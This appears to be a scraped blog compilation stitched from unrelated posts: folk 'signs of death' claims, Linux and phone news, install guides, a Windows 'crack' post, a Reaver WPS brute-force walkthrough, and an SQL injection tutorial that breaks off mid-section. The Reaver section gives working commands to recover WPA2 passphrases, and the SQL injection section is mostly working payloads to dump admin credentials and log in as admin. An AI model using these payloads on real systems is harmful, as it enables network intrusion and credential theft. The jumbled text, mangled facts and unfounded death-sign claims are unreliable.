signs of approaching death of 100, 40, 7, 3, and 1 day before

signs of approaching death of 100, 40, 7, 3, and 1 day before


God had marked the death of a
Muslims since 100 days, 40 days, 7 days, 3 days dan1 days before death.

Marks 100 days before death:
After the time of Asr (At the time of Asr because of the change from light to dark), we felt from head to toe chills, a very strong vibration, other than the usual, for y
ang realize it would be wonderful hearts, but were not aware, there is no influence of anything.

Signs 40 days before death:
After Asr, heart throbbing. The leaves are inscribed our names in lawh Mahfudz will fall. Angel of death would take a leaf out of us and started following our journey throughout the day.

Signs 7 days menjlang death:
Will be tested with a sick, sick person usually no appetite. But with this pain suddenly became tasteful and it's asking for food.

Signs 3 days before death:
Feels amid throbbing forehead. If the sign is considered, then we fasted, so that our stomach is not much unclean and facilitate business people bathe us later.

Signs 1 day before death:
At the time of Asr, we feel one pulsation in the crown, indicates that we did not get to see Ashar tomorrow morning.
For those who will feel cool khusnul khotimah section navel, then to the waist and throats, then in this condition
let us say two sentences creed.
 LiMo phone's interface is all thumbs

LiMo phone's interface is all thumbs

Emblaze Mobile offered new details on its "First Else" phone and Else Intuition stack, which is based on Access' ALP 3.0 stack and the LiMo (Linux Mobile) spec. The First Else offers unified messaging, geo-tagging, multimedia, an RSS live-updated "newspaper," and a thumb-oriented, fan-like touch interface called sPlay.Israel-based Emblaze Mobile also announced it has changed its named to Else Ltd., and will remain under the U.K.-based Emblaze Ltd. umbrella corporation. The company first showed off the Else phone last month with Japanese software firm Access at the latter's Access Day event in Japan.
The phone has a new name, expanding from "Else" to "First Else," presumably because a Second Else is in the works. As far as we can see, no new hardware details have emerged since the initial announcement, and the company offered no details on the manufacturer, potential carriers, or even its intended geographic region. 
Two views of First Else phone
(Click to enlarge)
Else has, however, posted a Flash-based website showing off the phone's impressive looking Else Intuition UI and related services. These include an innovative "sPlay" interface that is operated entirely with one's thumb, with menus splayed out in a fan- or dial-like motif.

Else Intuition's main "sPlay" menus
(Click on either to enlarge)

As we reported earlier, the First Else is based on the Texas Instruments (TI) OMAP3430 system-on-chip (SoC), and offers 256MB of RAM and 16GB internal flash. The Else is equipped with a 3.5-inch, 854 x 480 pixel capacitive touchscreen, as well as WiFi, 3G, Bluetooth, GPS, accelerometers, and a five-megapixel camera, says Access. (For the full spec list, plus more background on Emblaze/Else, Access, ALP, and LiMo, please see our earlier coverage, here).The Edge Intuition stack, meanwhile builds upon the LiMo specification with Access' ALP 3.0, one of the principal stacks compatible with the open source LiMo (Linux Mobile) specification. Aimed primarily at ARM Cortex devices, ALP 3.0 includes Access' NetFront Browser, as well as OpenGL-ES 2.0 support for 3D acceleration. Edge Intuition also incorporates a jointly developed user interface (UI) engine, as well as a suite of services provided by Edge Ltd, which also designed the Edge phone.

sPlay menus for dialing and photos
Edge Intuition most likely supports the next-generation LiMo R2 specification, which underlies the only other high-end LiMo smartphones available, Vodafone's 360 H1 and the slightly scaled down 360 M1, both manufactured by Samsung.
sPlay: All thumbsEdge Intuition enables users to switch between multiple, simultaneously running applications. In addition, all data and content, including contacts, appointments, videos, and photos, can be rendered anywhere, not only within a single dedicated application, says Else.
The UI stack offers an "sPlay" interface that immediately stands out with its novel menus, which are arranged like a Japanese fan that rolls and unrolls depending on touch movement and selections. The sPlay interface is entirely controlled by one's thumb, presumably making it easier to operate one handed. The interface supports several thumb gestures, and includes an onscreen QWERTY touchscreen with a text prediction and correction feature called EZkeys. This convenience appears to help make up for the lack of a slide out keyboard.

Quirecorder voice recording function (left) and mapping function

Like most other smartphones, the Else provides tilt sensors, and like some, it also offers automated, tilt-related features. These include converting the camera button into a voice recording button for the slick-looking "Quicorder" recording app by placing the phone face down. In addition, proximity sensors can auto-lock the phone when it's placed close to one's face in order to prevent unwanted selections when talking on the phone. 

Unified messaging features including a call log (left) and multimedia messaging features

Else Intuition is said to offer a single central database that provides an integrated, unified messaging view of calls, emails, text messages, contact, and contextual calendar reminders. In some ways this appears to be similar to unified messaging functionality provided in UI stacks such as HTC's Android-based Sense UI, Motorola's MotoBlur, or Vodafone's "360." Unlike those and several other recent smartphone stacks, however, Else does not have much to say about social networking sites like Facebook or Twitter, perhaps because it is aimed at an international audience where such sites are less popular than in the U.S. 

Else Intuition's contextual reminders (left) and EZkeys feature (right)

Other intriguing unified communications features include a SilenTalker function, which enables users who are otherwise occupied to present incoming callers with a menu, asking them about the urgency of their call, for example, or instructing them when they might be able to call back. The Else also includes a music player, a video player, and a customizable, live RSS-feed digital "newspaper," says the company.The photo album interface, meanwhile, supports geo-tagging, and the mapping app provides turn by turn directions, and offers a 3D interface that integrates pop-up, geo-tagged images. Even the web browser interface is markedly different from those of other smartphones, providing its own frame-like interface for frequently visited sites.
Flash demos are no replacement for real-world testing, but assuming all the functions operate as hyped, the Else could indeed be the next killer smartphone. Let's hope the next announcement – third time's a charm? – will be about availability, so we can get our hands on a device and see whether it will receive the thumbs up that it appears to deserve.
Stated Amir Kupervas, CEO of Emblaze Mobile, "Great technology is the kind that disappears when we use it -- it's so elegant and seamless; we don't even know it's there. It works its magic quietly, in the background -- the First Else was conceived from the start to challenge this standard."
Stated Tomihisa Kamada, president, CEO, and co-founder of Access, "The First Else, powered by Else Intuition, combines the elegance and simplicity of design that make mobile technology more accessible to users."


2012: What a Year for Linux

2012 has been another year of records for Linux. The operating system is the fastest growing platform across multiple industries and is inspiring new projects every single day. Join us as we review this amazing year and celebrate Linux and its global community of developers, contributors and sponsors. For more information about Linux, please visit http://www.linuxfoundation.org andhttp://www.linux.com.


this is awesome !!!

I LOVE LINUX....

activate windows 8 enterprise rtm 90 day / enterprise b 9200

lets begin ''''

to the point>>>>>>
 1st open CMD with admin premissions

2nd
lets see my pics..

sorry this is my fiancee hehehhe

i love her so much...

hehehehe

dont look at her

wkwkwkwk

pliissss just look on ss the cmd


3th this work on enterprise pro
u must be hrry up for crack this windows or microsoft gonna find this bug and ur wont be able to crack this again...

4th why i use this trials windows??
i know this is a lot of people ask to me...

my answer.. i hate a copy of software hehehe ^_^

i've been already buying some key heheheh

thats the way i dont use.....



specials thanks to my beloved girl in the world for give me some spirit for doing this

i love u so much rahmi ana
DASAR TEORI TENTANG LINUX

DASAR TEORI TENTANG LINUX



Sistem operasi Linux terdiri dari kernel, program sistem dan beberapa program Aplikasi. Kernel merupakan inti dari sistem operasi yang mengatur penggunaan Memory, piranti masukan dan keluaran proses-proses, pemakaian file pada file System dll. Program system dan semua program-program lainnya yang berjalan diatas Kernel disebut user mode.

Perbedaan mendasar antara program system dan program aplikasi adalah program sistem dibutuhkan agar suatu sistem operasi dapat berjalan, sedangkan program aplikasi adalah program system yang dibutuhkan untuk menjalankan suatu Aplikasi tertentu. Contoh daemon merupakan program system, dan pengolahan kata (word processor) merupakan program aplikasi. shell adalah jembatan antara user input dengan kernel, berfungsi memberikan fasilitas pada pengguna agar bisa berinteraksi dengan komputer ( baik software maupun hardware).

Shell adalah program yang membaca input standart yaitu keyboard, ketika kita mengetikkan sesuatu di keyboard maka shell akan menafsirkan apa yang kita ketikkan. Sebagai contoh apabila kita mengetikkan ls pada shell dan ls ternyata merupakan program yang akan di eksekusi maka shell akan menjalankan program tersebut.

Misal:

antoro@drutz:~$ ls

test

antoro@drutz:~$ ls

bash : hello: command not found

antoro@drutz:~$

Kita dapat melihat bahwa ketika ls kita ketikkan maka program ls dijalankan, sedangkan apabila kita jalankan hello dan karena memang tidak ada program maka shell tidak dapat mengeksekusi. Seperti halnya dalam disk operating system(dos) terdapat perintah-perintah untuk mengoperasikan sistem tersebut, begitu juga dalam Linux kita dapat mengelola dan mengatur sistem tersebut dengan perintah dasar(teks only). Linux membedakan penulisan perintah antara huruf besar dan kecil, secara umum syntax penggunaan perintah pada Linux adalah:

Perintah [option.....] [argumen]

Ciri-ciri perintah Linux UNIX antara lain:

1. membedakan huruf besar dan kecil(case sensitive).

2. ada perintah-perintah untuk administrator(sysadmin command).

3. ada perintah untuk sembarang user.

System operasi Linux terdiri dari kernel, program system, dan beberapa program aplikasi. Kernel merupakan inti dari system operasi yang mengatur penggunaan memori, piranti masukan dan keluaran proses-proses, file pada file system dll. Program system dan semua program-program lainnya yang berjalan diatas kernel disebut user mode.

Perbedaan mendasar antara program sistem dan program aplikasi adalah program sistem dibutuhkan agar suatu sistem operasi dapat berjalan, sedangkan program aplikasi adalah program sistem yang dibutuhkan untuk menjalankan aplikasi tertentu, contoh daemount merupakan program sistem dan program aplikasi shell adalah jembatan antara user input dengan kernel.

Linux merupakan kernel yang open source sehingga dapat dimiliki dan dirubah oleh siapa saja, akan tetapi ada beberapa perusahaan yang menaruh perhatian untuk turut serta mengembangkan Linux, seperti RedHad, Mandrake, Slackware dan lain-lain. Red Had berkantor pusat di Amerika ini biasa dibilang distro yang sudah turut membantu pengembangan Linux, dari sekian banyak distro Linux, Slackware termasuk salah satu yang ikut proses instalasi maupun dalam penggunaannya, Linux disusun berdasarkan Slackware, dua hal yang terpenting dalam Slackware adalah bahwa semua isinya ( kernel, library, ataupun aplikasinya ).

System operasi Linux memiliki program inti yang disebut kernel, Linux terdiri dari kernel, program sistem dan beberapa program aplikasi, kernel merupakan inti dari system operasi yang mengatur penggunaan memori, piranti masukan dan keluaran proses-proses pemakaian file pada file system dll, program system dan semua program-program lainnya yang berjalan diatas kernel disebut user mode. Kernel adalah suatu jembatan antara hardware dan aplikasi-aplikasi yang menterjemahkan bahasa software sehingga mampu di mengerti oleh hardware dan hardware segera memprosesnya sesuai dengan permintaan. Akibatnya hal tersebut memungkinkan pengguna untuk menggunakan atau bekerja dengan komputernya melalui software.

Kernel Linux terbagi beberapa bagian seperti manajemen proses, manajemen memori, hardware device driver, file system driver, manajemen memori menangani daerah pemakaian memori, daerah swap, bagian-bagian kernel untuk buffer cache, manajemen proses menangani pembuatan proses-proses dan penjadwalan proses. Pada bagian dasar kernel berisi hardware device driver untuk setiap jenis hardware yang di dukung. Jika pada lingkungan DOS terdapat Command yang berfungsi untuk menjembatani antara pengguna user dengan kernel, maka di Linux dikenal dengan nama shell. Shell ada bermacam-macam. Shell yang paling banyak digunakan di Linux adalah bash, selain itu shell yang lain adalah
Bourne Shell ( sh )
C Shell ( csh )
Korn Shell ( ksh )
Bourne again Shell ( bash )

Masing-masing shell memilikan perbedaan dalam hal tampilan dan pesan kesalahan, akan tetapi perintah dasar dan cara penulisannya adalah sama. Linux bisa berjalan hanya dengan ruang kosong 150 mb dalam hardisk.memory 2 mb ram, tatepi secara realitis tentunya di butuhkan ruang lagi untuk development tools, data dan sebagainya sehingga dibutuhkan sekitar 250mb spasi hard disk dan 12-16mb ram. Akan lain lagi ceritanya jika dengan keterbatasan seperti itu sebagai system operasi modern Linux mendukung banyak hardware yang beredar dipasaran tapi, ada beberapa yang tidak didukung karma masalah tehnik atau sekelompok sukarelawan sedang-sedang mengusahakan drivernya untuk distro mandrake umumnya berjalan secara normal pada hardware keluaran terbaru. Linux memiliki beberapa kelebihan diantaranya: Linux merupakan system operasi yang open source artinya pemakai diperkenankan untuk memiliki bahkan merubah source codenya untuk disesuaikan dengan kebutuhan masing-masing tanpa harus takut sanksi royalti. Demikian dengan program-program aplikasinya semua lisensinya dipegang oleh gnu gpl. Linux adalah tiruan unix. Pengembanagan linux pertama kali di lakukan Linus Benediet Torvads, Universitas Helsinki Vinlandia sebagai proyek hoby. Seluruh kode sumber Linux termasuk kernel, device drever, lebrarys, program dan tool pengembang disebarkan secara bebas dengan lisensi gpl persi ke2 kemudian berkembang cepat melalui bantuan seluruh programmer di dunia melalui jaringan internet Linux. Linux memiliki shared libraries, demand loading, shared copy on write executables,proper memory manajemen dan tcp/ip networking. Linux pertama kali dipublikasikan tahun 1991 dengan versi kernel 0.01 kemudian disusul versi 0.00\11 pada Desember 1991. pada versi 0.13 Linux sudah lebih stabil dan Linux memutuskan mengubah versinya menjadi versi 0.95. sifat Linux lebih terbuka membuatnya masih terus dikembangkan oleh kelompok-kelompok tanpa dibayar, yang banyak dijumpai di internet. Mereka saling tukar-menukar kode, melaporkan dan memenuhi segala masalah yang ada setiap orang yang tertarik dipersilahkan bergabung dalam pengembangan Linux.

Mungkin selama ini hanya akrap operating sistem yang berbasis windows saja, dengan beberapa variannya yang terkenal seperti windows 3.1, 95, NT, 98, ME, 2000 dan XP. Sedangkan ada beberapa operating sistem yang terdapat di pasaran seperti Sun Solaritar, Apple Macintosch, Unix dan Linux. Operating Linux sebenarnya merupakan kernel saja. Dapat diibaratkan kernel ibarat jantung dari system operasi sebab kernel mengatur semua proses seperti manajemen memori, proses input output, termasuk mengatur bekerjanya device atau hardware, jadi sebuah kernel tidak dapat digunakan secara langsung untuk kebutuhan aplikasi office terlebih multimedia Anda. Anda tidak mengalami kesulitan untuk mengupgrade kernel mandrake Linux 9.1 Anda, karena Mandrake Linux 9.1 telah memiliki versi kernel yang termasuk paling baru yaitu kernel 2.4.2.1 yang mendukung berbagai macam jenis hardware, sebuah kernel Linux membutuhkan adanya program tambahan yang berjalan diatasnya. Program itu berfungsi sebagai pelengkap, sehingga kernel Linux dapat digunakan untuk kebutuhan perkantoran dan fungsional lainnya. Program-program tersebut berada dalam satu lisensi GNU dan sebutan populernya adalah Distro atau distribusi. Sampai sejauh ini telah lahir berpuluh-puluh distro, bahkan para programmer berbasis Linux di tiap-tiap negara menciptakan distro sendiri.

Adapun distro yang stabil dan populer di antaranya adalah RedHad, Slackware, SUSe, Debian, Mandrake dan sebagainya. Mungkin para pengguna sistem operasi Windows akan dibingungkan dengan banyaknya pilihan distro tersebut, ditambah lagi banyaknya versi dari masing-masing distro yang ditunjukkan dengan besarnya angka di belakang nama distro tersebut, dan tentu saja di pusingkan untuk memilih distro nama sesuai untuk kebutuhannya.

Berikut ini adalah sedikit ulasan mengenai beberapa distro yang populer, sebagai pengantar bagi para pemerhati dan peminat Linux.

RedHad

RedHad Linux merupakan desktop yang sudah sangat populer bahkan lebih populer dan banyak digunakan oleh pengguna Linux. RedHad dikembangkan pada tahun 1995 oleh Bob Young dan Marc Ewing. RedHad memiliki pedoman instalasi yang sangat baik

Mandrake

Mandrake sejak awal mula peluncurannya pada tahun 1998 diharapkan dapat menjadi Dekstop Linux yang mudah digunakan dan user friendly. Kemudahan tersebut dapat ditemui dari awal Anda mengatur partisi dengan fasilitas disk drake dan juga melakukan instalasi program sampai saat Anda melakukan konfigurasi dan perubahan program aplikasi tambahan.

Suse

Suse adalah distro Linux yang berasal dari Jerman dan menitik beratkan pada desktop dan workstation, sehingga memiliki kemudahan dalam instalasi, meskipun tidak semudah Mandrake Linux, Suse memiliki kemampuan untuk mendeteksi Hardware baru USB, seperti kamira digital. Tetapi sayangnya Suse tidak dapat Anda download secara gratis di situsnya.

Gentoo Linux

Distro ini diciptakan oleh Daniel Robbins, salah seorang pendiri dari Stampede. Instalasi distro ini tergolong sangat sulit dan sangat lama apalagi jika Anda berbagi dengan partisi windows. Meskipun setelah Anda menginstalasi distro ini Anda dapat mudah melakukan up date jika keluar versi terbaru.

Knoppix Linux

Ini dikembangkan oleh Klaus Knopper dan tergolong distro baru yang saat ini sedang populer, kemampuan dan kecepatannya dalam melakukan deteksi hardware secara otomatis. Cd instalernya dapat digunakan secara mudah untuk booting dan juga dapat digunakan untuk melakukan rescue disk serta Anda juga dapat mencoba dan menggunakan knoppix terlebih dahulu dari cd tersebut tanpa melakukan instalasi.

SOURECE : https://irziqamdiken.wordpress.com/2012/04/18/dasar-teori-linux/#comment-33
Top 10 Ubuntu app downloads for July 2012

Top 10 Ubuntu app downloads for July 2012


Braid is returning to the top of the list for paid apps, Command & Conquer keeps strong as the most downloaded free app… and some new ones make it to the charts. Check out last month’s top 10 Ubuntu app downloads!

Top 10 paid apps


  1. Braid
  2. Super Meat Boy! [NEW!]
  3. Bastion
  4. Lone Survivor [NEW!]
  5. LIMBO
  6. Psychonauts
  7. Amnesia: The Dark Descent
  8. Superbrothers: Sword & Sworcery EP
  9. Fluendo DVD Player
  10. The Journey Down: Chapter One

Top 10 free apps


  1. Command & Conquer Tiberium Alliances
  2. Full Circle Magazine #61 [NEW!]
  3. IntelliJ IDEA Community Edition
  4. Plex Media Server
  5. CrossOver (Trial)
  6. Ryzom
  7. Muktware Ubuntu Manual [NEW!]
  8. Getting Started with Ubuntu 12.04 [NEW!]
  9. Create Launcher [NEW!]
  10. Screencloud [NEW!]
Would you like to see your app featured in this list and on millions of user’s computers? It’s a lot easier than you think:
Notes:
  • The lists of top 10 app downloads includes only those applications submitted through My Apps on the Ubuntu App Developer Site. For more information about of usage of other applications in the Ubuntu archive, check out the Ubuntu Popularity Contest statistics.
  • The top 10 free apps list contains gratis applications that are distributed under different types of licence, some of which might not be open source. For detailed licence information, please check each application’s description in the Ubuntu Software Centre.
Apple Mac OS X 10.7.4 Lion vs. Ubuntu Linux

Apple Mac OS X 10.7.4 Lion vs. Ubuntu Linux



Before Apple releases Mac OS X 10.8 "Mountain Lion" next month, here's a look at how the latest point release of Mac OS X 10.7 "Lion" is performing compared to Ubuntu 12.04 LTS "Precise Pangolin" and the latest development snapshot of Ubuntu 12.10 "Quantal Quetzal" Linux.
The OS X 10.7.4 vs. Ubuntu 12.04 LTS vs. Ubuntu 12.10 2012-06-21 benchmarking was done from a mid-2011 Mac Mini. This Apple Mac Mini from last year is based on Intel's Sandy Bridge micro-architecture with the Core i5 2415M. The Intel i5-2415M is a quad-core part with Hyper Threading (though under OS X 10.7.4 it still advertises itself as just having two logical cores) that has a base frequency of 2.3GHz and a maximum Turbo Frequency of 2.9GHz. Intel HD 3000 graphics are integrated and used by this low-end Apple device. The system has 2GB of RAM and a 500GB Hitachi hard drive.
After benchmarking the clean installation of Mac OS X 10.7.4, it was onto performing clean installs of Ubuntu 12.04 LTS followed by the 2012-06-21 snapshot of the forthcoming Ubuntu 12.10.
All three operating systems were running with their stock packages, compiler, OS settings, etc to test a proper "out of the box" experience.

sources : http://www.phoronix.com/scan.php?page=article&item=macosx_lion_precise&num=1
Canonical: Smartphone dengan OS Ubuntu Akan Hadir Tahun Depan

Canonical: Smartphone dengan OS Ubuntu Akan Hadir Tahun Depan


Ubuntu tampaknya tidak mau ketinggalan untuk ambil bagian dalam dunia ponsel. Dan kini dikabarkan bahwa peluncuran ponsel atau Smartphone dengan OS Ubuntu semakin dekat. Perusahaan sponsor Ubuntu, Canonical menyatakan bahwa OS Ubuntu akan hadir di ponsel tahun depan.
OS Ubuntu dikabarkan akan menggunakan kernel yang sama pada OS android. ketika nanti dirilis untuk Smartphone, OS Ubuntu bisa langsung di unduh secara bebas seperti versi desktop.
Namun OS Ubuntu versi Smartphone akan terlebih dahulu diberikan kepada para pembuat perangkat Smartphone. Pengguna nantinya akan disuguhkan pengalaman menggunakan OS Ubuntu yang sama dengan versi desktop, termasuk antarmuka dan Ubuntu Software Center.

source : http://www.beritateknologi.com

Exploiting WPA2 WPS vulnerabilities with Reaver and Backtrack 5


On December 27th, 2011, a new WPS vulnerability was disclosed by Stefan Viehböck. This severe vulnerability has the potential to expose pass phrases of any WPA/WPA2 networks running WPS via a brute force attack. US-Cert have acknowledged this attack with Note VU#723755.

WiFi Protected Setup (or WPS) is designed to make life easier for the average user. In most cases the user will press a button on their wireless access point, this will initiate an easy pairing sequence between the router and the client. If you have recently purchased a wireless router chances are it has WPS and it has probably been enabled by default.

Stefan worked out that the PIN used between the router/client is only 8 characters in length and that the last digit is a checksum, making the brute force password length 7 characters. To make matters worse, the router splits the 7 characters into 2 PINs, one of 4 characters and one of 3 and worse again it will confirm both pins independently. This means that there are 104 + 10possible combinations or 11,000 in total.

Some routers have built in protection that will only allow a specific amount of PIN attempts per allotted period of time, this will only slow the attack process though, if someone is willing to wait long enough they will recover the pass phrase.

While Stefan was exploring this vulnerability, so were the good folks at Tactical Network Solutions with their release of a brute force attack software namedreaver-wps. Reaver is able to brute force attack WPS PINs with the bold intention of recovering WPA/WPA2 pass phrases, lets take a look.



Using Reaver

This tools is extremely easy to use, I recommend a RTL8187 based wireless adapter (you already have one of these for your WEP pen testing right?).

1. Boot Backtrack 5, establish a network connection and install reaver.
apt-get install reaver

2. First lets take a look at the available networks, I still use airodump-ng for this.
airodump-ng wlan0


3. After finding the BSSID we are interested in (the one you just set up for your proof of concept), issue the following reaver command, replacing "00:11:22:33:44:55" with your target BSSID and "wlan0" with your adapter.

reaver -i wlan0 -b 00:11:22:33:44:55 -c 1 -vv 

The above command is attacking BSSID "00:11:22:33:44:55" on interface "wlan0" and channel 1, it is also using a high verbose level.


You can see from the image (click to enlarge) that Reaver begins to brute force combinations of pins. This process can take hours, the Reaver website suggests on average it will take between 4-10 hours to recover a pass phrase. The particular AP I tested the attack against had some PIN rate limiting protection  (as reported by Reaver) that significantly delays but doesn't stop the attack. I didn't leave the attack going more than a few minutes but you get the idea.

Fortunately there is a simple fix, disable WPS or even better, move to WPA2-Enterprise with a RADIUS back end. With any luck the WiFi Alliance and associated manufactures will release firmware updates quickly to resolve this issue, but for the time being millions of wireless access points remain vulnerable to this simple attack.



sources >>> http://blog.metasplo.it/2012/01/exploiting-wpa2-wps-vulnerabilities.html
Versi stabil dari Linux kernel 3.3.4 telah dirilis

Versi stabil dari Linux kernel 3.3.4 telah dirilis

Versi stabil dari Linux kernel 3.3.4 telah dirilis. Pada halaman ini kami akan membantu anda menginstal kernel Linux 3.3.4 di bawah sistem yang menjalankan Ubuntu 12.04/11.1o. Tapi sebelum anda menginstalnya, berikut adalah beberapa perubahan baru dalam rilis stabil terbaru:
  • Peningkatan dukungan untuk arsitektur ARM.
  • Penambahan perangkat driver dan meningkatkan dukungan untuk EFI boot.
  • Peningkatan dukungan untuk EXT4 dan Btrfs file-system modules.
Untuk perubahan log lengkap, periksa halaman ini.
Perhatian: Instalasi kernel, mungkin saja menimbulkan error pada sistem anda akibat compabilitas dukungan driver dan hardware. Sebaiknya pikirkan dahulu, jika anda ingin menginstalnya pada komputer yang anda gunakan untuk bekerja.
Instalasi Linux kernel 3.3.4
Ubuntu (i386 / 32-bit):
Buka terminal dan jalankan perintah berikut untuk menginstall kernel Linux 3.3.4 pada sistem yang mendukung PAE:
Untuk sistem 64-bit, Anda dapat menginstal Linux kernel 3.3.4 dengan perintah ini:

cd /tmp && wget -O linux-headers-3.3.4_all.deb http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.3.4-precise/linux-headers-3.3.4-030304_3.3.4-030304.201205011755_all.deb
sudo dpkg -i linux-headers-3.3.4_all.deb
cd /tmp && wget -O linux-headers-3.3.4-generic_amd64.deb http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.3.4-precise/linux-headers-3.3.4-030304-generic_3.3.4-030304.201205011755_amd64.deb
sudo dpkg -i linux-headers-3.3.4-generic_amd64.deb
cd /tmp && wget -O linux-image-3.3.4-generic_amd64.deb http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.3.4-precise/linux-image-3.3.4-030304-generic_3.3.4-030304.201205011755_amd64.deb
sudo dpkg -i linux-image-3.3.4-generic_amd64.deb

Untuk sistem non-PAE, anda dapat menginstal Linux kernel 3.3.4 dengan perintah ini:

cd /tmp && wget -O linux-headers-3.3.4_all.deb http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.3.4-precise/linux-headers-3.3.4-030304_3.3.4-030304.201205011755_all.deb
sudo dpkg -i linux-headers-3.3.4_all.deb
cd /tmp && wget -O linux-headers-3.3.4-generic_i386.deb http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.3.4-precise/linux-headers-3.3.4-030304-generic_3.3.4-030304.201205011755_i386.deb
sudo dpkg -i linux-headers-3.3.4-generic_i386.deb
cd /tmp && wget -O linux-image-3.3.4-generic_i386.deb http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.3.4-precise/linux-image-3.3.4-030304-generic_3.3.4-030304.201205011755_i386.deb
sudo dpkg -i linux-image-3.3.4-generic_i386.deb

Setelah selesai, reboot sistem anda dan periksa versi kernel anda dengan perintah ini:

uname -r


install fluxbox on backtrack 5

install fluxbox on backtrack 5

Instalasi Fluxbox di BackTrack5
Ini mungkin tutorial udah basi, tapi d’sini saya mau share cara instalasi Fluxbox di BackTrack 5.
Sekarang jika Anda belum tahu,  kita akan bahas Gnome dan KDE BackTrack5 juga dilengkapi dengan Window Manager yang lebih ringan dan itu disebut Fluxbox, untuk lebih jelasnya anda dapat mengunjungi halaman resmi mereka.
Bahkan menu BackTrack akan secara otomatis dihasilkan, jadi mari kita langsung saja!
* Pertama kita perlu menginstal paket flux-for-back yang akan ambil semua yang kita butuhkan untuk mendapatkan Fluxbox berjalan.
 root@bt:~# apt-get install flux-for-back
* Setelah script terinstal kita akan melihat bahwa secara otomatis akan setup Fluxbox.
Flux_for_back
Flux_for_back
* Setelah script selesai Anda akan disajikan dengan pesan yang memberitahu Anda untuk memulai fluxbox Anda.
Flux_for_back
Flux_for_back

* Namun sebelum kita restart ada satu hal yang harus kita lakukan, kita harus membuat memberitahu BackTrack untuk menjalankan fluxbox pada perintah startx dan default tidak WM itu.
root@bt:~# echo exec /usr/bin/startfluxbox > ~/.xinitrc
root@bt:~# shutdown -r 0
* Reboot Anda BackTrack dan menikmati Fluxbox!
Hasil Install FluxBox
Hasil Install FluxBox
CATATAN: Untuk kembali ke default WM yang harus Anda lakukan adalah menghapus file xinitrc..
root@bt:~# rm -rf ~/.xinitrc
root@bt:~# shutdown -r 0


sumber : http://blog.seneng.web.id/cara-instalasi-fluxbox-di-backtrack5.html
SQL Injection Tutorial (MySQL)

SQL Injection Tutorial (MySQL)

Full SQL Injection Tutorial (MySQL)

In this tutorial i will describe how sql injection works and how to
use it to get some useful information.

First of all: What is SQL injection?
It’s one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc…(in shortly).

1.SQL Injection (classic or error based or whatever you call it)
2.Blind SQL Injection (the harder part)

So let’s start with some action

1). Check for vulnerability
Let’s say that we have some site like this
http://www.site.com/news.php?id=5
Now to test if is vulrnable we add to the end of url ‘ (quote),
and that would be http://www.site.com/news.php?id=5′
so if we get some error like
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
or something similar
that means is vulrnable to sql injection

2). Find the number of columns
To find number of columns we use statement ORDER BY (tells database how to order the result)
so how to use it? Well just incrementing the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <– no error
http://www.site.com/news.php?id=5 order by 2/* <– no error
http://www.site.com/news.php?id=5 order by 3/* <– no error
http://www.site.com/news.php?id=5 order by 4/* <– error (we get message like this Unknown column ‘4′ in ‘order clause’ or something like that)
that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function
With union we can select more data in one sql statement.
so we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works

4). Check for MySQL version
http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try –
it’s a comment and it’s important for our query to work properly.
let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
if you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
i didn’t see any paper covering this problem, so i must write it
what we need is convert() function
i.e.
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()
i.e.
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get MySQL version

5). Getting table and column name
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12…) <— later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s …
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc…
i.e would be
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good :D)
we know that table admin exists…
now to check column names.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc…
now to check if column password exists
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1…
now we must complete query to look nice
for that we can use concat() function (it joins strings)
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(username,0×3a,password),3 from admin/*
Note that i put 0×3a, its hex value for : (so 0×3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
now we get dislayed username:password on screen, i.e admin:admin or admin:somehash
when you have this, you can login like admin or some superuser
if can’t guess the right table name, you can always try mysql.user (default)
it has user i password columns, so example would be
http://www.site.com/news.php?id=5 union all select 1,concat(user,0×3a,password),3 from mysql.user/*

6). MySQL 5
Like i said before i’m gonna explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.
to get tables we use table_name and information_schema.tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
note that i put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table is displayed.
for third table we put limit 2,1
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc…
To get the column names the method is the same.
here we use column_name and information_schema.columns
the method is same as above so example would be
